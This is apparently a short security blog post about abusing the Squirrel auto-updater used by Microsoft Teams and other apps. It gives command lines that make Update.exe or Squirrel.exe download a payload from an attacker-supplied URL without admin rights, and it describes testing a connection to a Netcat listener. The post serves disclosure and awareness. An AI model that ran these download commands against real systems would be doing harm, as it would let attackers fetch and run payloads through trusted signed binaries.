It was recently found that Microsoft Teams had a vulnerability which allows malicious parties to download payloads. This is due to its under-lining auto-update mechanism called Squirrel. It’s not just Microsoft teams who just use this, GitHub, UIPath and WhatsApp also use Squirrel behind the scenes.
It was recently found though that the Squirel.exe and Microsoft Teams update.exe can be ran with defined arguments. This could be abused, and malicious parties could use it to download payloads.
You don’t have to be admin and can test the exploit by running the following:
Update.exe – -update=[Payload URL]
Squirel.exe – -update=[Payload URL]
The example below shows the client establishing a connection to me Netcat session. Just to prove it will connect.
Other arguments can be used such as – -download and – -updateRollback.